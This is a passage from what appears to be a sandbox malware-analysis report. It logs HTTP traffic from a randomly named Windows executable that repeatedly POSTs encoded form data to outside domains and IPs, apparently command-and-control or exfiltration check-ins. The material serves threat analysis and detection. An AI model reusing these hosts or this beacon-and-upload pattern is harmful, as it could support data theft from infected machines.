                                                                  Data Ascii: EZ2lo=Ackij+btrTbeUgtSVJeKIEfZ69GcV3/5uRSpTR0cbs27KVtLjIrfKrmPKvK0dUD2f5WSl6da/pXxq+wfbAEg2VkoHaqDqkmIfhMMu0HOxzC7z3DvqNJUQNhZ8vDmBSgr6LCrEBBlZMWj2ueeOdQvlsJIhpASfSmMeB9gWBNFXOD8irJajczzKek1f7N14nXfn1dXiYcmfKenHkyoxw==
                                                                  Oct 7, 2024 10:39:47.713430882 CEST478INHTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:47 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.104999545.130.41.13806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:49.531136036 CEST1822OUTPOST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 41 63 6b 69 6a 2b 62 74 72 54 62 65 55 67 74 53 56 4a 65 4b 49 45 66 5a 36 39 47 63 56 33 2f 35 75 52 53 70 54 52 30 63 62 73 2b 37 4a 6e 4a 4c 69 76 48 66 59 37 6d 50 55 66 4b 70 64 55 44 76 66 35 4f 65 6c 36 5a 4b 2f 73 4c 78 73 59 38 66 54 53 73 67 76 6c 6b 6f 50 36 71 43 75 6b 6d 6e 66 68 63 41 75 30 33 4f 78 7a 43 37 7a 78 76 76 75 63 4a 55 57 4e 68 61 31 50 44 71 4b 79 68 4d 36 4c 62 54 45 42 55 51 5a 38 32 6a 31 4f 4f 65 64 4c 38 76 74 73 4a 4b 74 4a 41 42 66 53 72 53 65 41 51 5a 57 41 49 71 58 4d 54 38 6a 66 77 75 32 2f 62 34 4a 65 34 4f 51 6f 70 6e 37 52 43 6a 76 48 51 79 75 59 4a 6d 49 62 79 30 53 41 62 5a 7a 4f 50 45 62 6d 76 64 32 6d 59 48 62 54 41 6e 68 66 6a 4b 37 67 68 6a 72 33 48 4c 2b 61 6e 63 30 4c 42 75 54 52 70 46 55 48 31 31 4e 78 76 38 70 51 73 68 48 43 57 59 73 57 4d 6a 73 51 57 69 63 58 49 62 32 33 59 6c 71 31 45 54 32 76 47 63 65 67 72 55 59 55 2f 62 2b 52 6e 5a 77 56 31 35 51 6b 62 37 45 4f 66 4c 44 56 4f 71 76 45 34 51 69 4d 34 59 6d 77 7a 79 4c 56 78 4b [TRUNCATED]
                                                                  Data Ascii: EZ2lo=Ackij+btrTbeUgtSVJeKIEfZ69GcV3/5uRSpTR0cbs+7JnJLivHfY7mPUfKpdUDvf5Oel6ZK/sLxsY8fTSsgvlkoP6qCukmnfhcAu03OxzC7zxvvucJUWNha1PDqKyhM6LbTEBUQZ82j1OOedL8vtsJKtJABfSrSeAQZWAIqXMT8jfwu2/b4Je4OQopn7RCjvHQyuYJmIby0SAbZzOPEbmvd2mYHbTAnhfjK7ghjr3HL+anc0LBuTRpFUH11Nxv8pQshHCWYsWMjsQWicXIb23Ylq1ET2vGcegrUYU/b+RnZwV15Qkb7EOfLDVOqvE4QiM4YmwzyLVxKHHI+ODOZ9rGjX+rbkELEms87/cFqKoYv6uGTUJiJO6ufHQzRy9bLQM2RQY8YR3MHefEe5fh8VjbdIBsqZwUiBi5UfspLWpQElwSwW+BB5sVGTJbtvWKRtJyfrE9I8lKb552dO0tiOV6C7Dt0x+oB5ar+SPRk3Y4KxkLiii3YxdPyX2clvIcviNg8an0X2NlmOai/0UttWpDrJg/5t6b7N3LMBZnBH1UaojLevzzmlkT5IfP+Dvq73RsKpH1j40jei8wllljSSOatqCJYI+hY1CfAe/SM6/bJ0z51hEY4Qo0zIJIBR2Q/7JtHVrwKMUn01746eV4F4om0PsSNzcX0SKZMfMx932+++eSxlDI3lewAxcF0nOonTRcyRTPZ/5MQ6vIetUj/DyKpGZVWJAEJ0ozYsXy21N+Sax3wxXWFChB6RW/pqfcWfzbW4qjO1wML1GnOs0kow18sHgn3+wtayZxq2E39KXND0KNKeMsv8FOYJKjJY2sioj6k/c63mgAm0Ucuoodr8JQrTCo7n4nR4x1mtm5FlnBJc9T3z7sFGk+r+gRWsdATDzfG4UL8w9yH01gDhrPHzAM+hZOZ7D5hc5+dq0cothUJa1HqhLQUOmWfIkgyzAGejczKdK4jkYoJte9eAi+t5LdYXcxcR3L8imQKrB0gyJci05 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:50.287682056 CEST478INHTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:50 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.104999645.130.41.13806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:52.071204901 CEST517OUTGET /avd1/?EZ2lo=NeMCgL3W9jbBcF5QBI+xC2/C0rmOR2XSlRqEEw8EMM6ZBEMSksCLPJavXevPRkfiV5XKnMhO9JLxspMiSypcmF8IFrr+/UGmTQZVyy/nwgawwG6yzQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:52.807353973 CEST481INHTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:52 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 278
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 64 65 72 61 6c 6c 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.federall.store Port 80</address></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.10499973.33.130.190806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:57.890269041 CEST788OUTPOST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 69 6d 69 53 4c 6d 4d 71 53 78 6c 32 55 4c 54 74 46 47 79 53 35 42 45 6c 30 61 67 30 65 38 49 6e 49 70 68 73 62 4c 4c 6f 7a 37 2b 2b 36 31 44 41 73 30 59 61 34 58 31 6f 51 66 71 69 76 6b 54 6c 4e 71 6d 67 73 44 4d 71 6d 68 63 7a 71 4f 53 63 2b 32 42 71 4e 6e 4d 43 72 58 34 31 2f 30 6c 44 55 4c 76 4a 31 79 63 50 50 6a 4d 6e 76 44 62 45 76 79 78 54 64 6d 59 42 4d 32 47 2b 50 67 33 51 75 32 74 51 61 43 4d 68 35 66 64 65 50 6b 36 42 4c 2b 5a 57 57 63 65 46 68 31 6f 6f 55 68 56 4e 77 38 36 52 6e 44 69 70 57 67 50 30 6c 6f 34 42 59 6a 44 59 5a 59 66 68 6a 6e 4a 63
                                                                  Data Ascii: EZ2lo=imiSLmMqSxl2ULTtFGyS5BEl0ag0e8InIphsbLLoz7++61DAs0Ya4X1oQfqivkTlNqmgsDMqmhczqOSc+2BqNnMCrX41/0lDULvJ1ycPPjMnvDbEvyxTdmYBM2G+Pg3Qu2tQaCMh5fdePk6BL+ZWWceFh1ooUhVNw86RnDipWgP0lo4BYjDYZYfhjnJc


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.10499983.33.130.190806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:00.460304976 CEST812OUTPOST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 69 6d 69 53 4c 6d 4d 71 53 78 6c 32 47 34 4c 74 47 6c 61 53 78 42 45 6d 37 36 67 30 56 63 49 37 49 70 74 73 62 4f 7a 43 7a 4e 4f 2b 2f 6b 7a 41 74 32 38 61 35 58 31 6f 49 50 71 74 33 45 54 59 4e 71 71 43 73 47 4d 71 6d 68 49 7a 71 4c 57 63 2b 48 42 74 50 33 4d 41 74 58 34 7a 37 30 6c 44 55 4c 76 4a 31 79 4a 71 50 6a 45 6e 76 79 72 45 73 54 78 51 51 47 59 41 62 47 47 2b 4c 67 33 71 75 32 74 32 61 44 68 70 35 62 74 65 50 68 47 42 4c 76 5a 56 44 4d 65 48 6c 31 6f 35 53 6b 35 43 33 75 53 61 74 44 36 43 43 52 54 45 6d 4a 5a 47 4a 79 69 50 4b 76 44 76 74 68 38 32 44 54 69 77 79 58 4e 71 73 39 42 6e 35 51 62 37 59 44 31 4a 49 67 3d 3d
                                                                  Data Ascii: EZ2lo=imiSLmMqSxl2G4LtGlaSxBEm76g0VcI7IptsbOzCzNO+/kzAt28a5X1oIPqt3ETYNqqCsGMqmhIzqLWc+HBtP3MAtX4z70lDULvJ1yJqPjEnvyrEsTxQQGYAbGG+Lg3qu2t2aDhp5btePhGBLvZVDMeHl1o5Sk5C3uSatD6CCRTEmJZGJyiPKvDvth82DTiwyXNqs9Bn5Qb7YD1JIg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.10499993.33.130.190806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:03.056168079 CEST1825OUTPOST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 69 6d 69 53 4c 6d 4d 71 53 78 6c 32 47 34 4c 74 47 6c 61 53 78 42 45 6d 37 36 67 30 56 63 49 37 49 70 74 73 62 4f 7a 43 7a 4e 47 2b 2f 32 37 41 72 58 38 61 2f 6e 31 6f 42 76 71 75 33 45 54 2f 4e 71 43 47 73 47 49 51 6d 6a 77 7a 34 35 65 63 31 56 35 74 56 6e 4d 41 68 33 34 32 2f 30 6c 57 55 4c 66 4e 31 79 5a 71 50 6a 45 6e 76 78 6a 45 36 79 78 51 57 47 59 42 4d 32 47 69 50 67 32 46 75 32 31 49 61 44 6c 35 73 34 6c 65 4f 42 32 42 4f 64 68 56 65 38 65 42 69 31 70 6b 53 6b 38 43 33 75 50 6a 74 41 6d 6f 43 57 58 45 33 6f 30 53 4e 42 37 56 5a 65 72 6f 79 41 4a 4e 45 47 61 43 2f 57 49 31 76 2b 5a 6f 6b 51 61 53 53 33 67 67 4b 4d 46 48 6c 44 64 36 79 39 64 42 69 35 41 45 34 34 68 46 5a 50 2b 59 64 6f 50 39 72 5a 41 49 30 6a 6b 72 41 58 37 77 74 4c 67 64 57 46 59 72 63 64 75 6c 72 72 49 46 39 48 38 69 71 66 50 78 65 32 65 67 59 43 43 68 42 44 50 79 45 6a 74 36 76 68 47 62 4e 79 44 36 58 6d 6a 33 41 68 76 38 67 73 6d 33 55 45 41 7a 30 67 54 36 73 62 74 2f 62 71 2f 31 62 4e 5a 72 70 58 6f 7a [TRUNCATED]
                                                                  Data Ascii: EZ2lo=imiSLmMqSxl2G4LtGlaSxBEm76g0VcI7IptsbOzCzNG+/27ArX8a/n1oBvqu3ET/NqCGsGIQmjwz45ec1V5tVnMAh342/0lWULfN1yZqPjEnvxjE6yxQWGYBM2GiPg2Fu21IaDl5s4leOB2BOdhVe8eBi1pkSk8C3uPjtAmoCWXE3o0SNB7VZeroyAJNEGaC/WI1v+ZokQaSS3ggKMFHlDd6y9dBi5AE44hFZP+YdoP9rZAI0jkrAX7wtLgdWFYrcdulrrIF9H8iqfPxe2egYCChBDPyEjt6vhGbNyD6Xmj3Ahv8gsm3UEAz0gT6sbt/bq/1bNZrpXozRgHXkiYYMegMILFMdkfY7HaW5MyAA9m+Y2QX/pmkxDN58jPzh3aVm8EnHPnaMr27f3cpiw1WFUzvJgBVwuj+CqwpDKbRLH7A5qETxVJIC5y/YxYY/3we9w2RgsVPQjupXWr+l2rdOKv2ONoWXfFoZGmQq7BMnCqu1dKkRaUXBMokv/HyT/ywtvF627sLt7ZTZr+gUjJJO4NYjHW3nGED1TieO0eUJ+/5iTNyVnXSr0fQCZDfeQ2G2bUsD6sfQyakw+wT4CuoVHV/JUWICsVj0CNnHcALgSt0OBmNTU+wPvaXhY3gmEaOLBvZR4esnIWh6C1BmnVM0cDGgGQAwvzj3pLJSEYLlaOPrnhrXyODzz0eB8P5qGSfsHg3NLWYpZBvQu0RCuwcS8Nb/F5ETp0EQOjQZCrh3spzwrfKh3RsZM2yABDjFjXmUaIbVTsAMSyqnTJ6gIHME02ZUfXqrbIa7HvfRQnMzCIoevPCi/dxMqFqpDlpkFAUHRCxGyxDZ6IlWeBJu1buuvGD84UklSLknI8NQE8cNZWDbh3fKoO+hA+41A5TxxHrK2cv1jywuEGdLimXexCGxouXBVLxMmn719cbfTsBlVVh1/Xd31cle8p+DYiwJnOm4vi1rOENvhciQtqFn4npO+TsxHSP1CAs8anPJIuJ+q4aeo [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.10500003.33.130.190806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:05.600244045 CEST518OUTGET /gbk4/?EZ2lo=vkKyIW0tFglfe9bmeE+ByzsP8tU/YNgfJJINKebc7ayTo2CGj2Bmv1A0Nfus+XH8P5LArwMekXdWm5WC/1gWFlJYtj1QuGdjZIz6/BBdIThi9XPOug==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:08.992609978 CEST389INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 07 Oct 2024 08:40:08 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 249
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 5a 32 6c 6f 3d 76 6b 4b 79 49 57 30 74 46 67 6c 66 65 39 62 6d 65 45 2b 42 79 7a 73 50 38 74 55 2f 59 4e 67 66 4a 4a 49 4e 4b 65 62 63 37 61 79 54 6f 32 43 47 6a 32 42 6d 76 31 41 30 4e 66 75 73 2b 58 48 38 50 35 4c 41 72 77 4d 65 6b 58 64 57 6d 35 57 43 2f 31 67 57 46 6c 4a 59 74 6a 31 51 75 47 64 6a 5a 49 7a 36 2f 42 42 64 49 54 68 69 39 58 50 4f 75 67 3d 3d 26 37 4e 50 3d 37 46 58 58 55 50 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EZ2lo=vkKyIW0tFglfe9bmeE+ByzsP8tU/YNgfJJINKebc7ayTo2CGj2Bmv1A0Nfus+XH8P5LArwMekXdWm5WC/1gWFlJYtj1QuGdjZIz6/BBdIThi9XPOug==&7NP=7FXXUPl"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.1050001203.175.9.128806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:17.397810936 CEST782OUTPOST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 47 63 79 33 43 36 45 38 69 37 34 30 38 59 69 64 4a 56 32 55 47 61 54 43 4d 65 48 30 67 4c 36 41 50 37 6f 65 73 4c 73 76 33 4d 57 39 59 39 4d 76 49 6f 74 78 66 71 38 35 50 48 57 7a 71 50 69 31 59 43 56 46 61 5a 55 35 46 50 70 2b 6a 4b 4b 77 4a 43 74 55 78 7a 77 48 63 42 6c 65 77 4e 4e 44 2b 6c 70 71 43 2b 6b 6e 34 69 4c 45 42 67 51 4c 38 4c 4f 51 6f 41 57 2f 49 79 75 58 70 34 34 33 79 6c 4f 68 32 4f 31 46 50 52 4b 57 4a 58 47 42 5a 70 67 65 75 78 33 45 58 54 6e 39 69 79 6a 44 51 74 2f 64 70 5a 6b 58 46 4a 53 30 77 38 7a 41 35 45 55 4d 59 50 75 4c 47 70 6a 66
                                                                  Data Ascii: EZ2lo=Gcy3C6E8i7408YidJV2UGaTCMeH0gL6AP7oesLsv3MW9Y9MvIotxfq85PHWzqPi1YCVFaZU5FPp+jKKwJCtUxzwHcBlewNND+lpqC+kn4iLEBgQL8LOQoAW/IyuXp443ylOh2O1FPRKWJXGBZpgeux3EXTn9iyjDQt/dpZkXFJS0w8zA5EUMYPuLGpjf


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.1050002203.175.9.128806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:19.947967052 CEST806OUTPOST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 47 63 79 33 43 36 45 38 69 37 34 30 36 34 53 64 61 31 4b 55 41 36 54 42 44 2b 48 30 70 72 36 63 50 37 30 65 73 4b 70 71 32 2b 79 39 59 59 6f 76 4c 71 4a 78 61 71 38 35 48 6e 58 34 75 50 69 75 59 43 52 33 61 62 77 35 46 50 39 2b 6a 4b 36 77 4a 78 46 54 7a 6a 77 5a 54 68 6c 63 2b 74 4e 44 2b 6c 70 71 43 2b 77 64 34 68 37 45 41 56 59 4c 38 75 79 58 70 41 57 77 42 53 75 58 2b 6f 34 7a 79 6c 50 45 32 4c 64 76 50 54 79 57 4a 56 65 42 61 34 67 64 33 68 33 43 61 7a 6e 71 70 77 47 6d 61 38 54 48 76 5a 6b 46 63 66 47 4a 33 64 53 48 6f 56 31 62 4c 34 79 46 49 76 57 31 69 6a 43 6a 68 2b 37 6a 51 6d 6f 58 4b 51 73 36 33 73 65 78 64 67 3d 3d
                                                                  Data Ascii: EZ2lo=Gcy3C6E8i74064Sda1KUA6TBD+H0pr6cP70esKpq2+y9YYovLqJxaq85HnX4uPiuYCR3abw5FP9+jK6wJxFTzjwZThlc+tND+lpqC+wd4h7EAVYL8uyXpAWwBSuX+o4zylPE2LdvPTyWJVeBa4gd3h3CaznqpwGma8THvZkFcfGJ3dSHoV1bL4yFIvW1ijCjh+7jQmoXKQs63sexdg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.1050003203.175.9.128806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:22.496325016 CEST1819OUTPOST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
